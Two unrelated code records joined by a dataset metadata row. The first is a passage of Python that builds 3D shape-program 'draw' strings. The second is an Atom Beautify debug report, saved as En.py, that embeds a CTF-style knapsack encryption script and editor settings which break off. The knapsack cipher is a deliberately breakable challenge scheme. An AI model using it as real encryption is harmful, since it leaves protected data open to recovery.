sentence = "draw('Base', 'Circle', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 9:
sentence = "draw('Base', 'Square', P=({},{},{}), G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 10:
angle = round(param[5]) % 4
if angle == 0:
p1, p2, p3 = param[0], param[1], param[2] - param[4]
elif angle == 1:
p1, p2, p3 = param[0], param[1] + param[4], param[2]
elif angle == 2:
p1, p2, p3 = param[0], param[1], param[2] + param[4]
elif angle == 3:
p1, p2, p3 = param[0], param[1] - param[4], param[2]
else:
raise ValueError("The angle type of the cross is wrong")
sentence = "draw('Base', 'Line', P1=({},{},{}), P2=({},{},{}))" \
.format(param[0], param[1], param[2], p1, p2, p3)
elif pgm == 11:
sentence = "draw('Sideboard', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 12:
sentence = "draw('Hori_Bar', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 13:
sentence = "draw('Vert_Board', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 14:
sentence = "draw('Locker', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 15:
theta = np.arctan(float(param[6])/param[3]) / np.pi * 180
sentence = "draw('Back', 'Cub', P=({},{},{}), G=({},{},{}), theta={}\N{DEGREE SIGN})" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5], int(theta))
elif pgm == 16:
sentence = "draw('Chair_Beam', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 17:
sentence = "draw('Connect', 'Line', P1=({},{},{}), P2=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 18:
sentence = "draw('Back_sup', 'Cub', P=({},{},{}), G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif self.translate <= pgm <= self.end:
sentence = None
else:
sentence = None
elif num_trans == 1 and num_rot == 0:
if pgm == 1:
sentence = "draw('Leg', 'Cub', P=({},{},{})+i*u, G=({},{},{}))"\
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 2:
sentence = "draw('Top', 'Rec', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 3:
sentence = "draw('Top', 'Square', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 4:
sentence = "draw('Top', 'Circle', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 5:
sentence = "draw('Layer', 'Rec', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 6:
sentence = "draw('Sup', 'Cylinder', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 7:
sentence = "draw('Sup', 'Cub', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 8:
sentence = "draw('Base', 'Circle', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 9:
sentence = "draw('Base', 'Square', P=({},{},{})+i*u, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 10:
angle = round(param[5]) % 4
if angle == 0:
p1, p2, p3 = param[0], param[1], param[2] - param[4]
elif angle == 1:
p1, p2, p3 = param[0], param[1] + param[4], param[2]
elif angle == 2:
p1, p2, p3 = param[0], param[1], param[2] + param[4]
elif angle == 3:
p1, p2, p3 = param[0], param[1] - param[4], param[2]
else:
raise ValueError("The angle type of the cross is wrong")
sentence = "draw('Base', 'Line', P1=({},{},{})+i*u, P2=({},{},{}))+i*u" \
.format(param[0], param[1], param[2], p1, p2, p3)
elif pgm == 11:
sentence = "draw('Sideboard', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 12:
sentence = "draw('Hori_Bar', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 13:
sentence = "draw('Vert_Board', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 14:
sentence = "draw('Locker', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 15:
theta = np.arctan(float(param[6])/param[3]) / np.pi * 180
sentence = "draw('Back', 'Cub', P=({},{},{})+i*u, G=({},{},{}), theta={}\N{DEGREE SIGN})" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5], int(theta))
elif pgm == 16:
sentence = "draw('Chair_Beam', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 17:
sentence = "draw('Connect', 'Line', P1=({},{},{})+i*u, P2=({},{},{}))+i*u" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 18:
sentence = "draw('Back_sup', 'Cub', P=({},{},{})+i*u, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif self.translate <= pgm <= self.end:
sentence = None
else:
sentence = None
elif num_trans == 2 and num_rot == 0:
if pgm == 1:
sentence = "draw('Leg', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))"\
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 2:
sentence = "draw('Top', 'Rec', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 3:
sentence = "draw('Top', 'Square', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 4:
sentence = "draw('Top', 'Circle', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 5:
sentence = "draw('Layer', 'Rec', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 6:
sentence = "draw('Sup', 'Cylinder', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 7:
sentence = "draw('Sup', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 8:
sentence = "draw('Base', 'Circle', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 9:
sentence = "draw('Base', 'Square', P=({},{},{})+i*u1+j*u2, G=({},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4])
elif pgm == 10:
angle = round(param[5]) % 4
if angle == 0:
p1, p2, p3 = param[0], param[1], param[2] - param[4]
elif angle == 1:
p1, p2, p3 = param[0], param[1] + param[4], param[2]
elif angle == 2:
p1, p2, p3 = param[0], param[1], param[2] + param[4]
elif angle == 3:
p1, p2, p3 = param[0], param[1] - param[4], param[2]
else:
raise ValueError("The angle type of the cross is wrong")
sentence = "draw('Base', 'Line', P1=({},{},{})+i*u1+j*u2, P2=({},{},{}))+i*u1+j*u2" \
.format(param[0], param[1], param[2], p1, p2, p3)
elif pgm == 11:
sentence = "draw('Sideboard', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 12:
sentence = "draw('Hori_Bar', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 13:
sentence = "draw('Vert_Board', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 14:
sentence = "draw('Locker', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 15:
theta = np.arctan(float(param[6])/param[3]) / np.pi * 180
sentence = "draw('Back', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}), theta={}\N{DEGREE SIGN})" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5], int(theta))
elif pgm == 16:
sentence = "draw('Chair_Beam', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 17:
sentence = "draw('Connect', 'Line', P1=({},{},{})+i*u1+j*u2, P2=({},{},{}))+i*u" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif pgm == 18:
sentence = "draw('Back_sup', 'Cub', P=({},{},{})+i*u1+j*u2, G=({},{},{}))" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
elif self.translate <= pgm <= self.end:
sentence = None
else:
sentence = None
elif num_trans == 0 and num_rot == 1:
if pgm == 10:
angle = round(param[5]) % 4
if angle == 0:
p1, p2, p3 = param[0], param[1], param[2] - param[4]
elif angle == 1:
p1, p2, p3 = param[0], param[1] + param[4], param[2]
elif angle == 2:
p1, p2, p3 = param[0], param[1], param[2] + param[4]
elif angle == 3:
p1, p2, p3 = param[0], param[1] - param[4], param[2]
else:
raise ValueError("The angle type of the cross is wrong")
sentence = "draw('Base', 'Line', P1=({},{},{}), P2=({},{},{}), theta*i, axis)" \
.format(param[0], param[1], param[2], p1, p2, p3)
elif pgm == 17:
sentence = "draw('Base', 'Line', P1=({},{},{}), P2=({},{},{}), theta*i, axis)" \
.format(param[0], param[1], param[2],
param[3], param[4], param[5])
else:
sentence = None
else:
sentence = None
return sentence
| 48.388175 | 113 | 0.370504 | 2,079 | 18,823 | 3.325637 | 0.060125 | 0.072028 | 0.075933 | 0.124964 | 0.885016 | 0.874892 | 0.85985 | 0.859126 | 0.857246 | 0.839745 | 0 | 0.062483 | 0.410774 | 18,823 | 388 | 114 | 48.512887 | 0.560905 | 0.005791 | 0 | 0.700565 | 0 | 0.011299 | 0.183796 | 0.023577 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011299 | false | 0.011299 | 0.00565 | 0 | 0.031073 | 0.002825 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de1ec32e58887240fae02a62a2ee3b4967e4f101 | 183,341 | py | Python | En.py | Phantom8208/Glab | 20e0108384f4e46872767a3932ed0c61dd6a150c | [
"Net-SNMP",
"Xnet"
] | null | null | null | En.py | Phantom8208/Glab | 20e0108384f4e46872767a3932ed0c61dd6a150c | [
"Net-SNMP",
"Xnet"
] | null | null | null | En.py | Phantom8208/Glab | 20e0108384f4e46872767a3932ed0c61dd6a150c | [
"Net-SNMP",
"Xnet"
] | null | null | null | # Atom Beautify - Debugging information
The following debugging information was generated by `Atom Beautify` on `Sun Jul 23 2017 20:31:33 GMT+0800 (中国标准时间)`.
---
## Table Of Contents
- [Versions](#versions)
- [Original file to be beautified](#original-file-to-be-beautified)
- [Original File Contents](#original-file-contents)
- [Package Settings](#package-settings)
- [Beautification options](#beautification-options)
- [Final Options](#final-options)
- [Results](#results)
- [Logs](#logs)
---
**Platform**: win32
## Versions
**Atom Version**: 1.14.3
**Atom Beautify Version**: 0.30.3
## Original file to be beautified
**Original File Path**: `C:\Users\xyz_MG\Desktop\XXXXXX\2017ncstisc\enc.py`
**Original File Grammar**: Python
**Original File Language**: Python
**Language namespace**: python
**Supported Beautifiers**: autopep8, pybeautifier, yapf
**Selected Beautifier**: autopep8
### Original File Contents
```python
from Crypto.Util import number
from Crypto import Random
from Crypto.PublicKey.pubkey import *
import sys
def generateKeys(msg_len):
randomFunc = Random.new().read
upperbound = 1<<(2*msg_len+4)
sk = [number.getRandomRange(1, upperbound, randomFunc)]
for i in range(1, msg_len):
sk.append(number.getRandomRange(sum(sk) + 1, upperbound, randomFunc))
upperbound = upperbound << 2
N = number.getRandomRange(sk[msg_len-1] + 1, 2*sk[msg_len-1], randomFunc)
mask = number.getRandomRange(N/4, 3 * N/4, randomFunc)
while number.GCD(mask, N) != 1:
mask = number.getRandomRange(1, N, randomFunc)
pk = [ s * mask % N for s in sk ]
return sk, N, mask, pk
def encrypt(msg, pk):
assert(len(msg) == len(pk))
return sum([ int(msg[i]) * pk[i] for i in range(len(pk)) ])
def decrypt(cipher, sk, N, mask, pk):
msg = ['0'] * len(pk)
cipher = cipher * number.inverse(mask, N) % N
# sk = [ p * number.inverse(mask, N) % N for p in pk]
for i in range(len(pk))[::-1]:
if cipher >= sk[i]:
cipher -= sk[i]
msg[i] = '1'
print msg
return hex(int(''.join(msg), 2))[2:].rstrip('L').decode('hex')
if __name__ == "__main__":
msg = sys.argv[1]
msg_bit = bin(int(msg.encode('hex'), 16))[2:]
sk, N, mask, pk = generateKeys(len(msg_bit))
print sk, N, mask, pk
open('key.pub','w').write(str(pk))
enc = encrypt(msg_bit, pk)
print enc
print decrypt(enc, sk, N, mask, pk)
open('enc','w').write(str(enc))
```
### Package Settings
The raw package settings options
```json
{
"general": {
"_analyticsUserId": "",
"loggerLevel": "warn",
"beautifyEntireFileOnSave": true,
"muteUnsupportedLanguageErrors": false,
"muteAllErrors": false,
"showLoadingView": true
},
"apex": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"arduino": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"bash": {
"indent_size": 2,
"disabled": false,
"default_beautifier": "beautysh",
"beautify_on_save": false
},
"cs": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"c": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"clj": {
"disabled": false,
"default_beautifier": "cljfmt",
"beautify_on_save": false
},
"coffeescript": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "coffee-fmt",
"beautify_on_save": false
},
"cfml": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"cpp": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"crystal": {
"disabled": false,
"default_beautifier": "Crystal",
"beautify_on_save": false
},
"css": {
"indent_size": 2,
"indent_char": " ",
"selector_separator_newline": false,
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"end_with_newline": false,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"csv": {
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"d": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"ejs": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 250,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"indent_inner_html": false,
"indent_scripts": "normal",
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"elm": {
"disabled": false,
"default_beautifier": "elm-format",
"beautify_on_save": false
},
"erb": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"erlang": {
"disabled": false,
"default_beautifier": "erl_tidy",
"beautify_on_save": false
},
"gherkin": {
"indent_size": 2,
"indent_char": " ",
"disabled": false,
"default_beautifier": "Gherkin formatter",
"beautify_on_save": false
},
"glsl": {
"configPath": "",
"disabled": false,
"default_beautifier": "clang-format",
"beautify_on_save": false
},
"go": {
"disabled": false,
"default_beautifier": "gofmt",
"beautify_on_save": false
},
"gohtml": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"fortran": {
"emacs_path": "",
"emacs_script_path": "",
"disabled": false,
"default_beautifier": "Fortran Beautifier",
"beautify_on_save": false
},
"handlebars": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"haskell": {
"disabled": false,
"default_beautifier": "stylish-haskell",
"beautify_on_save": false
},
"html": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"jade": {
"indent_size": 2,
"indent_char": " ",
"disabled": false,
"default_beautifier": "Pug Beautify",
"beautify_on_save": false
},
"java": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"js": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"json": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"jsx": {
"e4x": true,
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
"eval_code": false,
"unescape_strings": false,
"wrap_line_length": 0,
"end_with_newline": false,
"end_with_comma": false,
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"latex": {
"indent_char": " ",
"indent_with_tabs": false,
"indent_preamble": false,
"always_look_for_split_braces": true,
"always_look_for_split_brackets": false,
"remove_trailing_whitespace": false,
"align_columns_in_environments": [
"tabular",
"matrix",
"bmatrix",
"pmatrix"
],
"disabled": false,
"default_beautifier": "Latex Beautify",
"beautify_on_save": false
},
"less": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"lua": {
"end_of_line": "System Default",
"disabled": false,
"default_beautifier": "Lua beautifier",
"beautify_on_save": false
},
"markdown": {
"gfm": true,
"yaml": true,
"commonmark": false,
"disabled": false,
"default_beautifier": "Tidy Markdown",
"beautify_on_save": false
},
"marko": {
"indent_size": 2,
"indent_char": " ",
"syntax": "html",
"indent_inner_html": false,
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"ins",
"small",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "Marko Beautifier",
"beautify_on_save": false
},
"mustache": {
"indent_inner_html": false,
"indent_size": 2,
"indent_char": " ",
"brace_style": "collapse",
"indent_scripts": "normal",
"wrap_line_length": 250,
"wrap_attributes": "auto",
"wrap_attributes_indent_size": 2,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"unformatted": [
"a",
"abbr",
"area",
"audio",
"b",
"bdi",
"bdo",
"br",
"button",
"canvas",
"cite",
"code",
"data",
"datalist",
"del",
"dfn",
"em",
"embed",
"i",
"iframe",
"img",
"input",
"ins",
"kbd",
"keygen",
"label",
"map",
"mark",
"math",
"meter",
"noscript",
"object",
"output",
"progress",
"q",
"ruby",
"s",
"samp",
"select",
"small",
"span",
"strong",
"sub",
"sup",
"svg",
"template",
"textarea",
"time",
"u",
"var",
"video",
"wbr",
"text",
"acronym",
"address",
"big",
"dt",
"strike",
"tt",
"pre",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
],
"end_with_newline": false,
"extra_liners": [
"head",
"body",
"/html"
],
"disabled": false,
"default_beautifier": "JS Beautify",
"beautify_on_save": false
},
"nginx": {
"indent_size": 2,
"indent_char": " ",
"indent_with_tabs": false,
"dontJoinCurlyBracet": true,
"disabled": false,
"default_beautifier": "Nginx Beautify",
"beautify_on_save": false
},
"nunjucks": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"objectivec": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"ocaml": {
"disabled": false,
"default_beautifier": "ocp-indent",
"beautify_on_save": false
},
"pawn": {
"configPath": "",
"disabled": false,
"default_beautifier": "Uncrustify",
"beautify_on_save": false
},
"perl": {
"perltidy_profile": "",
"disabled": false,
"default_beautifier": "Perltidy",
"beautify_on_save": false
},
"php": {
"cs_fixer_path": "",
"cs_fixer_version": 2,
"cs_fixer_config_file": "",
"fixers": "",
"level": "",
"rules": "",
"allow_risky": "no",
"phpcbf_path": "",
"phpcbf_version": 2,
"standard": "PEAR",
"disabled": false,
"default_beautifier": "PHP-CS-Fixer",
"beautify_on_save": false
},
"puppet": {
"disabled": false,
"default_beautifier": "puppet-lint",
"beautify_on_save": false
},
"python": {
"max_line_length": 79,
"indent_size": 4,
"ignore": [
"E24"
],
"formater": "autopep8",
"style_config": "pep8",
"sort_imports": false,
"multi_line_output": "Hanging Grid Grouped",
"disabled": false,
"default_beautifier": "autopep8",
"beautify_on_save": false
},
"r": {
"indent_size": 2,
"disabled": false,
"default_beautifier": "formatR",
"beautify_on_save": false
},
"riot": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"ruby": {
"indent_size": 2,
"indent_char": " ",
"rubocop_path": "",
"disabled": false,
"default_beautifier": "Rubocop",
"beautify_on_save": false
},
"rust": {
"rustfmt_path": "",
"disabled": false,
"default_beautifier": "rustfmt",
"beautify_on_save": false
},
"sass": {
"disabled": false,
"default_beautifier": "SassConvert",
"beautify_on_save": false
},
"scss": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"configPath": "",
"predefinedConfig": "csscomb",
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"spacebars": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"sql": {
"indent_size": 2,
"keywords": "upper",
"identifiers": "unchanged",
"disabled": false,
"default_beautifier": "sqlformat",
"beautify_on_save": false
},
"svg": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"swig": {
"indent_size": 2,
"indent_char": " ",
"wrap_line_length": 250,
"preserve_newlines": true,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"tss": {
"indent_size": 2,
"indent_char": " ",
"newline_between_rules": true,
"preserve_newlines": false,
"wrap_line_length": 0,
"indent_comments": true,
"force_indentation": false,
"convert_quotes": "none",
"align_assignments": false,
"no_lead_zero": false,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"twig": {
"indent_size": 2,
"indent_char": " ",
"indent_with_tabs": false,
"preserve_newlines": true,
"space_in_paren": false,
"space_after_anon_function": false,
"break_chained_methods": false,
"wrap_line_length": 250,
"end_with_comma": false,
"disabled": false,
"default_beautifier": "Pretty Diff",
"beautify_on_save": false
},
"typescript": {
"indent_size": 2,
"indent_char": " ",
"indent_level": 0,
"indent_with_tabs": false,
"preserve_newlines": true,
"max_preserve_newlines": 10,
"space_in_paren": false,
"jslint_happy": false,
"space_after_anon_function": false,
"brace_style": "collapse",
"break_chained_methods": false,
"keep_array_indentation": false,
"keep_function_indentation": false,
"space_before_conditional": true,
